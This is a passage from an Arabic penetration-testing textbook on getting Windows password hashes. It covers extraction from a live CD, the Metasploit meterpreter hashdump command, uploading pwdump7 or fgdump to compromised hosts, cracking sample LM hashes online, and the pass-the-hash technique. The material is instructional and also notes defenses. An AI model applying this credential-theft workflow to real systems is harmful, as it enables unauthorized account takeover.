‫اﻵن ﻟدﯾﻧﺎ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺣﻔوظﺔ‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ ﻧﻘﻠﮭﺎ ﻣن اﻟﻘرص ﻛﺎﻟﻲ اﻟﺣﻲ‪ .‬وﯾﻣﻛن أن ﯾﺗم ھذا ﺑﺑﺳﺎطﺔ ﻋن طرﯾﻖ إرﺳﺎل اﻟﻣﻠف‬
‫‪ hash.txt‬ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﯾﺔ ﻟﻧﻔﺳك أو إدراج ﻣﺣرك أﻗراص ‪ USB‬وﺧﻠﻖ ﻧﺳﺧﺔ ﻣﺣﻠﯾﺔ ﻣن اﻟﮭﺎش‪ .‬ﻓﻲ ﻛﻠﺗﺎ اﻟﺣﺎﻟﺗﯾن‪ ،‬ﺗﺄﻛد ﻣن‬
‫ﺣﻔظ اﻟﻣﻠف ‪ hashes.txt‬ﻷﻧك ﺗﻌﻣل ﻣن ﻗرص ﻣﺿﻐوط "‪ "Live CD‬واﻟﺗﻐﯾﯾرات ﻟﯾﺳت ﻣﺳﺗﻣرة‪ .‬وھذا ﯾﻌﻧﻲ إﻧﮫ ﻋﻧد إﻋﺎدة ﺗﺷﻐﯾل اﻟﺟﮭﺎز‬
‫اﻟﮭدف‪ ،‬ﺳﺗزول ﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﻓﻲ اﻟﻘرص ﻛﺎﻟﻲ‪ .‬ﻣﻊ ﻣﻠف ھﺎش ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم اﻟﺗﻲ ﺗﺳﺗﮭدﻓﮫ ﻓﻲ ﻣﺗﻧﺎول اﻟﯾد‪ ،‬ﯾﻣﻛﻧك اﻟﺑدء‬
‫ﻓﻲ ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪.‬‬

‫ﻣﻠﺣوظﮫ‪:‬‬
‫ﻗد ﻗﻠﻧﺎ ﻣن ﻗﺑل اﻧﮫ ﯾوﺟد ﻧوﻋﯾن ﻣن اﻟﮭﺎش‪ ،‬ﺣﯾث اﻧﮫ ﻋﻧدﻣﺎ ﯾﻛون اﻟﮭﺎش ‪ LM‬ﻣﻔﻌل ﻣﺛل أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ‪ XP‬واﻻﺻدارات اﻷﻗل ﻓﺎن ﺷﻛل‬
‫اﻟﮭﺎش ﺳوف ﯾﻛون ھﻛذا‪.‬‬

‫اﻣﺎ إذا ﻛﺎن اﻟﮭﺎش ‪ LM‬ﻏﯾر ﻣﻔﻌل ﻛﻣﺎ ﻓﻲ إﺻدارات وﯾﻧدوز ﻓﺳﺗﺎ و‪ 7‬واﻻﺻدارات اﻻﺣدث ﻓﯾﻛون ﺷﻛل اﻟﮭﺎش ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Extracting Windows Password Hashes Remotely‬‬


‫اﻵن ﻟدﯾك ﻓﮭم ﻋﻣﯾﻖ ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻣن ﻣﻧظور اﻟﻣﮭﺎﺟم اﻟﻣﺣﻠﻲ‪ ،‬دﻋوﻧﺎ ﻧﺄﺧذ ﺑﺿﻊ دﻗﺎﺋﻖ ﻟﻣﻧﺎﻗﺷﺔ اﻟﺣﺻول ﻋﻠﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻋن ﺑﻌد‬
‫‪ .remotely‬ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة ﯾﺗم ﺑﻌدة طرق‪:‬‬
‫‪Man in the Middle attack‬‬

‫ﺣﯾث ﯾﻣﻛﻧك اﺳﺗﺧدام ‪ ettercap‬وھﺟﻣﺎت رﺟل ﻓﻲ اﻟﻣﻧﺗﺻف ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﻋﺑر اﻟﺷﺑﻛﺔ‪ .‬ﺳوف ﻧﺗطرق ﻟﺷرح‬
‫‪ ettercap‬ﻻﺣﻘﺎ‪ .‬ھﻧﺎك اﻟﻛﺛﯾر اﻟذي ﯾﻣﻛن اﻟﻘﯾﺎم ﺑﮫ ﺑواﺳطﺔ ‪ ettercap‬وھﻧﺎك اﻟﻌدﯾد ﻣن اﻟدروس اﻟﺗﻲ ﺗﻐطﻲ ﻛﯾﻔﯾﺔ اﺳﺗﺧداﻣﮭﺎ!‬
‫‪Metasploit / hashdump‬‬

‫ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة ﻋﺎدة ﻣﺎ ﯾﺗم اﻟﻘﯾﺎم ﺑﮭﺎ ﻋن ﺑﻌد وﺗﻛون ﺑﻌد أطﻼق ‪ exploit‬ﺑﻧﺟﺎح ﺿد اﻟﺟﮭﺎز اﻟﮭدف‪ .‬ﻓﻲ ﻣﺛﺎﻟﻧﺎ‬
‫اﻟﺳﺎﺑﻖ‪ ،‬ﻋﻧدﻣﺎ ﺗﺣدﺛﻧﺎ ﻋن اﺳﺗﺧدام ‪ Metasploit‬ﻹطﻼق ﺣﻣوﻟﺔ ‪ VNC‬ﻋﻠﻰ ھدﻓﻧﺎ اﻟﺑﻌﯾد‪ .‬ﻓﻲ ﺣﯾن أن ﺣﻣوﻟﺔ ‪ VNC‬ھو ﺑﺎﻟﺗﺄﻛﯾد ﻣﻣﺗﻌﺔ‪،‬‬
‫وﻟﻛﻧﻧﺎ ﺳوف ﻧﺣﺗﺎج اﻟﻰ ﻗذﯾﻔﺔ ‪ .Meterpreter‬وﺳوف ﺗﺳﺗﺧدم ‪ Metasploit‬ﻟﻠﺣﺻول ﻋﻠﻰ ﺷل ﻋن ﺑﻌد ﻋﻠﻰ اﻟﮭدف واﻟﺗﻲ ﺗوﻓر ﻟﻧﺎ‬
‫اﻟوﺻول إﻟﻰ اﻟﻌدﯾد ﻣن أواﻣر اﻟﺗرﻣﻧﺎل )ﺑﯾن أﻣور أﺧرى( واﻟﺗﻲ ﺗﺳﮭل ﺟﻣﻊ ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ﺑﺳﮭوﻟﮫ‪ .‬ﺑﻌد ﺗﺷﻐﯾل ﺟﻠﺳﺔ ‪Meterpreter‬‬
‫ﻋﻠﻰ اﻟﮭدف اﻟﺧﺎص ﺑك‪ ،‬ﺑﺑﺳﺎطﺔ ﻧدﺧل اﻷﻣر " ‪ Meterpreter.“ hashdump‬ﺳوف ﯾﺗﺟﺎوز ﺟﻣﯾﻊ اﻵﻟﯾﺎت اﻷﻣﻧﯾﺔ اﻟﻘﺎﺋﻣﺔ ﻟوﯾﻧدوز‬
‫وﺳوف ﺗﻘدم ﻟك اﺳم اﻟﻣﺳﺗﺧدم اﻟﻣﺳﺗﮭدف و اﻟﮭﺎش اﻟﻣﻘﺎﺑل ﻟﮫ‪.‬‬

‫ﻟﺳﮭوﻟﺔ اﻻﻣر ﺳوف ﻧﺳﺗﺧدم اﻷداة ‪ armitage‬واﻟﺗﻲ ﺗﻌﺗﺑر اﻟوﺟﮫ اﻟرﺳوﻣﯾﺔ ﻟل ‪ metasploit‬واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﺳوف ﻧﻘوم ﺑﺈطﻼق‬
‫‪ exploit‬ﻧﺎﺟﺢ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ﺛم ﻧﻧﺷﺊ ‪ meterpreter session‬ﻧﺎﺟﺢ ﻋﻠﯾﮫ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪345‬‬

‫ﺑﻌد إطﻼق ‪ exploit‬ﻧﺎﺟﺢ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف وﻓﺗﺢ ‪ meterpreter session‬ﻋﻠﯾﮫ ﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻻﻣر ‪ hashdump‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام ﻛﻼ ﻣن ‪ pwdump7‬او ‪ fgdump‬وﯾﻛون اﺳﺗﺧداﻣﮭم ﻛﺎﻻﺗﻰ‪:‬‬


‫‪ -‬ﺑﻌد إطﻼق ‪ exploit‬ﻧﺎﺟﺢ واﺧﺗراق اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫‪ -‬ﻧﻘوم ﺑﻔﺗﺢ ‪ session‬ﻟل ‪.meterpreter‬‬
‫‪ -‬ﻧﻘوم ﺑﺗﺣﻣﯾل ﻣﻠف اﻟﻧﺳﺧﺔ اﻟﻣﺧﺻﺻﺔ ﻟﻠﻌﻣل ﻋﻠﻰ اﻟوﯾﻧدوز ‪ pwdump7‬او ‪ fgdump‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻧﻘوم اﻻن ﺑﺗﺷﻐﯾل ‪ CMD‬ﻋﻠﻰ ‪ meterpreter‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫‪ -‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل اﻻﻣر ‪ pwdump7‬ﻛﻣﺎ ﻓﻌﻼ ﺳﺎﺑﻘﺎ‪.‬‬


‫ﻣﻠﺣوظﮫ‪ pwdump7 :‬ﻻ ﺗﻌﻣل ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ‪xp‬ﻟذﻟك ﯾﻔﺿل اﺳﺗﺧدام ‪ pwdump6‬ﻓﻲ ﺣﺎل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ‪.xp‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪346‬‬

‫اﻻن ﺑﻌد ان ﺣﺻﻠﻧﺎ ﻋﻠﻰ اﻟﮭﺎش ﻣﺎذا ﻧﻔﻌل؟‬


‫ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش ھو ﻧﺻف اﻟﻣﻌرﻛﺔ ﻧﻧﺗﻘل اﻻن اﻟﻰ ﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﻣرور وﻣﻌرﻓﺔ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﺔ ﺑﺷﻛل واﺿﺢ‪.‬‬

‫‪Cracking Simple Lm Hashes‬‬


‫ﻣﻘﺪﻣﮫ‪:‬‬
‫ﻛﻠﻧﺎ ﻧﻌﻠم ﺟﻣﯾﻌﺎ ان دﻋم ﻣﺎﯾﻛروﺳوﻓت ﻟﻧظﺎم اﻟﺗﺷﻐﯾل ‪ Windows XP SP3‬و ‪Office 2003‬أﻧﺗﮭﻰ رﺳﻣﯾﺎ ﻓﻲ ‪ 8‬أﺑرﯾل ‪ .2014‬ﻣﺎ ﯾﻘرب‬
‫ﻣن ‪ ٪ 40‬ﻣن ﻣﺳﺗﺧدﻣﻲ اﻟﻛﻣﺑﯾوﺗر ﻻ ﺗزال ﺗﺳﺗﺧدم وﻓﻘﺎ ﻟﺑﻌض اﻟﺗﻘﺎرﯾر‪ .‬وھذا ﻋدد ﺿﺧم ﻣن أﻧظﻣﺔ وﯾﻧدوز ‪ XP‬اﻟﺗﻲ ﻻ ﺗزال ﺗﺳﺗﺧدم ﻓﻲ‬
‫ﻣﺟﺎل اﻷﻋﻣﺎل اﻟﺗﺟﺎرﯾﺔ‪ .‬أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻻ ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻧص ﻋﺎدي‪ ،‬وﻟﻛن ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﺷﻛل ﻣﺷﻔر ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ‪ .‬ھﻧﺎك‬
‫اﻟﻌدﯾد ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﺗﺳﺗﺧدﻣﮭﺎ اﻟﺣواﺳﯾب ﻟﺗﺷﻔﯾر ﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬واﺣدة ﻣن أﻛﺛر اﻟطرق أﻣﺎﻧﺎ ھﻲ ‪ salting‬ﻟﻛﻠﻣﺔ‬
‫اﻟﻣرور‪ .‬ﺗﺳﺗﺧدم اﻟﻌدﯾد ﻣن أﻧظﻣﺔ وﯾﻧدوز ‪ XP‬ھﺎش ﻣن اﻟﻧوع ‪ LM‬ﻟﺣﻣﺎﯾﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬ھذا ھو وﺳﯾﻠﺔ ﻗدﯾﻣﺔ ﺟدا وﻋﻔﺎ ﻋﻠﯾﮭﺎ‬
‫اﻟزﻣن ﻟﺗﺧزﯾن ھﺎش ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﺗم إﻧﺷﺎء ھذه اﻟﻌﻣﻠﯾﺔ ﻟﻸﻧظﻣﺔ ﻗﺑل ظﮭور وﯾﻧدوز ‪.NT‬‬
‫‪Cracking Lm Passwords Online‬‬
‫ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺈدﺧﺎل ‪ Windows LM hash‬وﺳﯾﻌود اﻟﻣوﻗﻊ ﻟك ﺑﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺳﺗﺧدﻣﺔ )إذا ﻛﺎﻧت ﻓﻲ ﺟدول‬
‫اﻟﺑﺣث اﻟﺧﺎﺻﺔ ﺑﮫ(‪.‬‬
‫ﻗد وﺿﻌت ﺷرﻛﺔ اﻷﻣن اﻟﺳوﯾﺳرﯾﺔ واﻟﺗﻲ ﯾطﻠﻖ ﻋﻠﯾﮭﺎ ‪) Objectif Sécurité‬اﻟﺗﻲ أﻧﺷﺄت ‪ (Ophcrack‬ﺗﻘﻧﯾﺔ ﻟﻛﺳر ﻟﻛﻣﺎت اﻟﻣرور‬
‫ﺑﺎﺳﺗﺧدام ‪ Rainbow table‬ﻋﻠﻰ ﻣﺣرﻛﺎت أﻗراص ‪ .SSD‬أﻧﮭﺎ ﺗوﻓر ﻓﺗره ﺗﺟرﯾﺑﯾﮫ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣن ﺗﻛﻧوﻟوﺟﯾﺗﮭﺎ واﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ‬
‫ﻛﺳر اﻟﻌدﯾد ﻣن ‪ LM Password‬ﻓﻲ ﺛوان ﻣﻌدودات‪.‬‬
‫‪http://www.objectif-securite.ch/en/ophcrack.php‬‬
‫ﺳﻧﺣﺎول اﺳﺗﺧدام ازواج ﻣن اﻟﮭﺎش وﻧرى ﻣﺎ ﯾﻣﻛن اﻟﻘﯾﺎم ﺑﮫ‪ .‬دﻋوﻧﺎ ﻧﺑدأ ﻣﻊ اﻟﺳﮭل‪ .‬ھﻧﺎ ھو ھﺎش ﻛﻠﻣﺔ اﻟﺳر ﻟﻣدﯾر ﻧظﺎم ﻋﻠﻰ ﺟﮭﺎز ‪:XP‬‬
‫‪Hash: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0‬‬

‫اﻧظر ﻣﺎذا ﺣدث اﺳﺗطﺎع اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور وھﻲ ‪ Empty password‬اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﮭﺎش اﻟذي ادﺧﻠﻧﮭﺎ وﻗد اﺳﺗﻐرق وﻗﺗﺎ ﻻ ﯾزﯾد ﻋن‬
‫ﺛﺎﻧﯾﺗﯾن‪.‬‬
‫ﻓﻠﻧﺣﺎول اﻻن اﺳﺗﺧدام ھﺎش ذات ﺻﻌوﺑﺔ ﺑﺎﻟﻣﻘﺎرﻧﺔ ﺑﺎﻟﮭﺎش اﻟﺳﺎﺑﻖ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪347‬‬

‫‪Hash: 17817c9fbf9d272af44dfa1cb95cae33:6bcec2ba2597f089189735afeaa300d4‬‬

‫ﻧﺟد اﻧﮫ اﺳﺗﻐرق ‪ 4‬ﺛواﻧﻲ ﻟﻌطﺎء اﻟﻧﺗﯾﺟﺔ‪ .‬ﻓﻠﻧﺣﺎول اﻻن اﺳﺗﺧدام ھﺎش أﺻﻌب ﻣن ذي ﻗﺑل ﺑﺎﻟﻣﻘﺎرﻧﺔ ﺑﺎﻟﮭﺎش اﻟﺳﺎﺑﻖ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪Hash: d4b3b6605abec1a16a794128df6bc4da:14981697efb5db5267236c5fdbd74af6‬‬

‫ﻧﺟد اﻧﮫ اﺳﺗﻐرق ﻣن اﻟوﻗت ‪ 6‬ﺛواﻧﻲ ﻹﯾﺟﺎد ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﮭﺎش‪.‬‬
‫ﻣؤﺛرة ﺟدا‪ ،‬ﻓﻠﻘد اﺳﺗﻐرق ﻓﻘط ‪ 7-4‬ﺛواﻧﻲ ﻓﻲ ھذا اﻻﺧﺗﺑﺎر ﻟﻛﺳر ﻋدد ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻌﻘدة اﻟﻣﻛوﻧﺔ ﻣن ‪ 14‬ﺣرف‪ .‬ھذه اﻷداة ﻣﺧﺻﺻﮫ‬
‫ﻟﮭﺎش ‪ LM‬ﻓﻲ وﯾﻧدوز ‪ XP‬وﻟﯾﺳت ﻟوﯾﻧدوز ‪ /8/7‬ﺳﯾرﻓر ‪ 2008‬اﻟﺗﻲ ﺗﺳﺗﻧد ﻋﻠﻰ ھﺎش ‪NTLM‬اﻟذي ﯾﻌد أﻛﺛر أﻣﻧﻧﺎ‪.‬‬
‫وﻟﻛن‪ ،‬أﻋﺗﻘد أﻧﮫ ﻣﻊ زﯾﺎدة ﺳرﻋﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﺄن اﻻﻋﺗﻣﺎد ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور وﺣدھﺎ ﻗد ﻻ ﺗﻛون ﻣﻘﯾﺎس أﻣﻧﻲ ﺟﯾد‪ .‬ﺣﯾث اﻟﻌدﯾد ﻣن‬
‫اﻟﺷرﻛﺎت واﻟﻣراﻓﻖ اﻟﺣﻛوﻣﯾﺔ اﺑﺗﻌدت ﻋن اﺳﺗﺧدام ﻛﻠﻣﺎت اﻟﻣرور وﺣدھﺎ ﻓﻘط واﺳﺗﺧدﻣت أﺳﺎﻟﯾب اﻟﻣﺻﺎدﻗﺔ اﻟﻣزدوﺟﺔ‪ .‬اﻟﻣﻘﺎﯾﯾس اﻟﺣﯾوﯾﺔ‬
‫)‪ (Biometrics‬واﻟﺑطﺎﻗﺎت اﻟذﻛﯾﺔ )‪ (smartcards‬أﺻﺑﺣت أﻛﺛر ﺷﻌﺑﯾﺔ ﻓﻲ أﻻﻣﺎﻛن اﻟﺗﻲ ﺗﺣﺗﺎج اﻟﻰ ﻣﺳﺗوﯾﺎت اﻣﻧﯾﮫ ﻋﺎﻟﯾﺔ‪.‬‬
‫ﻓﻠﻧﺣﺎول اﻻن اﺳﺗﺧدم اﻟﮭﺎش اﻟذي اﺳﺗﺧرﺟﻧﺎه ﻣن ﻗﺑل وﻣﻌرﻓﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺑﺻورة واﺿﺣﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪348‬‬

‫‪Hash-identifier‬‬

‫ھﻲ أداة ﺑﺎﯾﺛون ﺗﺳﺗﺧدم ﻟﺗﺣدﯾد أﻧواع اﻟﮭﺎش وﻣدﻣﺟﺔ ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪ .‬ﻣﻌظم أدوات ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻣﺛل ‪John the Ripper‬‬
‫ﺗﺷﻣل وظﯾﻔﺔ اﻟﻛﺷف اﻟﺗﻠﻘﺎﺋﻲ ﻋن اﻟﮭﺎش اﻟﺗﻲ ھﻲ ﺟﯾدة ﺟدا‪ ،‬ورﺑﻣﺎ ‪ 90‬ﻓﻲ اﻟﻣﺋﺔ ﻧﺳﺑﺔ دﻗﺗﮭﺎ‪ .‬ھذه اﻷداة ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﺗﺣﻘﻖ ﻣن ﻧوع‬
‫اﻟﮭﺎش ﯾدوﯾﺎ‪ .‬ﺑﺑﺳﺎطﺔ ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ Hash ID‬وﻧدﺧل ﻣﻌﮫ اﻟﮭﺎش‪ .‬ھذا اﻟﺑرﻧﺎﻣﺞ ﺳوف ﯾﺗﺣﻘﻖ ﻣن ذﻟك وﯾﻌود اﻟﯾك ﺑﺎﻟﻧوع اﻻﻛﺛر ﺷﯾوﻋﺎ ﻣن‬
‫اﻟﮭﺎش اﻟﺗﻲ ﻟدﯾك ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ أﻧواع اﻷﻗل اﺣﺗﻣﺎﻻ‪.‬‬
‫ﯾﻣﻛﻧك ﺗﺷﻐﯾل ھذه اﻷداة ﻣن ﻗﺎﺋﻣﺔ ادوات ﻛﺎﻟﻲ‪:‬‬
‫‪Kali LinuxPassword AttacksOffline AttacksHash-Identifier‬‬
‫ﻓﻘط ﻗم ﺑطﺑﺎﻋﺔ اﻟﮭﺎش و‪ Hash ID‬ﺳوف ﯾﻌود اﻟﯾك ﺑﻧوع ھذا اﻟﮭﺎش ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Findmyhash‬‬
‫ھو ﺳﻛرﯾﺑت ﺑﺎﯾﺛون ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪ ،‬واﻟﺗﻲ ﺗﺳﺗﺧدم ﺧدﻣﺔ اﻻﻧﺗرﻧت اﻟﻣﺟﺎﻧﯾﺔ ﻟﻛﺳر اﻟﮭﺎش‪ .‬ﯾﺟب أن ﺗﻛون ﻣوﺻل إﻟﻰ اﻹﻧﺗرﻧت‬
‫ﻗﺑل اﺳﺗﺧدام ھذه اﻷداة‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪349‬‬

‫اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ‪:‬‬
‫‪#findmyhash <Encryption> -h hash‬‬

‫‪Pass the HASH‬‬


‫ﻓﻲ اﻟﻣﻘطﻊ اﻟﺳﺎﺑﻖ ﺗﺣدﺛﻧﺎ ﻋن ﻛﯾﻔﯾﺔ ﻛﺳر ھﺎش ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺳﺗﻧدة اﻟﻰ‪ ، Windows LM‬وﻟﻛن ﻣﺎذا ﻋن ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺳﺗﻧدة اﻟﻰ‬
‫‪NTLM‬؟‬
‫أﻧظﻣﺔ وﯾﻧدوز ﻋﺎدة ﺗﺧزﯾن ھﺎش ‪ NTLM‬ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ھﺎش ‪ ،LM‬ھﺎش ‪ NTLM‬ﻛوﻧﮭﺎ أﻛﺛر أﻣﻧﺎ‪ .‬وﻛﻣﺎ ذﻛرت‪ ،‬ﯾﻣﻛن أن ﺗﻘوم‬
‫ﺑﺈﯾﻘﺎف ھﺎش ‪)LM‬أو ﺑﻣﺟرد اﺳﺗﺧدام ﻛﻠﻣﺎت ﺳر أطول ﻣن ‪ 14‬ﺣرﻓﺎ(‪ .‬وﻟﻛن ﻣﺎ ھﻲ اﻟﻣدة اﻟﺗﻲ ﺳوف ﺗﺳﺗﻐرق ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور أذا‬
‫اﺳﺗﺧدم ‪ NTLM Hash‬ﻓﻘط؟‬
‫ھذا ھو اﻟﺳؤال اﻟﻛﺑﯾر‪ ،‬واﻟﺟواب ھو‪ ،‬إذا ﺗم اﺳﺗﯾﻔﺎء ظروف ﻣﻌﯾﻧﺔ‪ ،‬واﺳﺗﺧدام ﺗﻘﻧﯾﺔ ﻣﻌﯾﻧﺔ‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن أن ﺗﺄﺧذ ﻧﻔس اﻟﻣﻘدار ﻣن اﻟوﻗت‪.‬‬
‫اﺳﻣﺣوا ﻟﻲ أن أﺷرح‪ ،‬إذا ﻛﻧت ﺗﺳﺗطﯾﻊ اﺳﺗرداد ‪ LM‬أو ‪ NT‬ھﺎش ﻣن ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‪ ،‬ﻓﺄﻧك ﻻ ﺗﺣﺗﺎج ﻟﻛﺳر ھذا اﻟﮭﺎش‪ .‬ﺣﯾث ﻓﻲ ﺑﻌض‬
‫اﻷﺣﯾﺎن ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﺗﺧﺎذ ھذا اﻟﮭﺎش ﻛﻣﺎ ھو واﺳﺗﺧداﻣﮫ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬وﺗﺳﻣﻰ ھذه اﻟﺗﻘﻧﯾﺔ "‪."Pass the Hash‬‬
‫او ﺑﻣﻌﻧﻰ اﺧر ان ھذا اﻟﮭﺟوم اﻟﻣﮭﺎﺟم ﻻ ﯾﻘوم ﺑﻣﺣﺎوﻟﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور وإﻧّﻣﺎ ﺗﻣرﯾرھﺎ‪ .‬ﺑﺎﺳﺗﺧدام ادوات ﺧﺎﺻﺔ ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺣﻘن اﻟﮭﺎش‬
‫ﻓﻲ ذاﻛرة ‪ Local Security Authority Subsystem Service‬وﺑﻌد ذﻟك ﯾﻣﻛﻧﮫ اﺳﺗﺧدام اي ﺧدﻣﺔ او اداة ﻓﻲ اﻟوﯾﻧدوز ﺑﺻﻼﺣﯾﺎت‬
‫اﻟﻣﺳﺗﺧدم ﺻﺎﺣب اﻟﮭﺎش اﻟذي ﺣﺻل ﻋﻠﯾﮫ اﻟﻣﮭﺎﺟم‪ .‬ﺗزداد ﻓﻌﺎﻟﯾﺔ وﺧطورة اﻟﮭﺟوم ﻓﻲ ﺣﺎل ﻛون اﻟﮭﺎش ھو ﻟﻣدﯾر اﻟﻧّظﺎم‪.‬‬
‫اﻟﮭﺟوم ﻓﻲ اﻟوﻗت اﻟﺣﺎﻟﻲ ﯾﺳﺗﮭدف ﻧظﺎم وﯾﻧدوز وﻟﻛن ھذا ﻻ ﯾﻌﻧﻲ ان اﻻﻧظﻣﺔ اﻻﺧرى ﻓﻲ ﻣﺄﻣن ﻣن ھذا اﻟﮭﺟوم ﻓﺑداﯾﺗﮫ ﻛﺎﻧت ﻓﻲ ‪ 1997‬ﺿد‬
‫‪Samba‬ﻋﻠﻰ ﻧظﺎم اﻟﯾوﻧﻛس‪.‬‬

‫ﻋﻠﻰ اﻟرﻏم ﻣن أن ﺑﻌض ھذه اﻟﮭﺟﻣﺎت ﻟم ﺗﻌد ﺗﻌﻣل ﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﻣﺣدﺛﺔ‪ .‬ﺣﯾث ﯾﺗم اﺻطﯾﺎد ﺑﻌض اﻵﻟﯾﺎت اﻟﻣﺳﺗﺧدﻣﺔ وﻣﻧﻌﮭﺎ‪ .‬وﺗﻌﯾﯾن‬
‫‪ NTLM2‬أو ‪ kerberos‬ﺗﺳﺗﺧدم ﻟﮭزﯾﻣﺔ ھذا اﻟﻧوع ﻣن اﻟﮭﺟﻣﺎت‪ .‬أﯾﺿﺎ ﻣﯾزة اﻟﺗﺣﻛم ﻓﻲ ﺣﺳﺎب اﻟﻣﺳﺗﺧدم ‪ UAC‬ﻓﻲ وﯾﻧدوز ‪ 7‬اﻏﻠﻘت‬
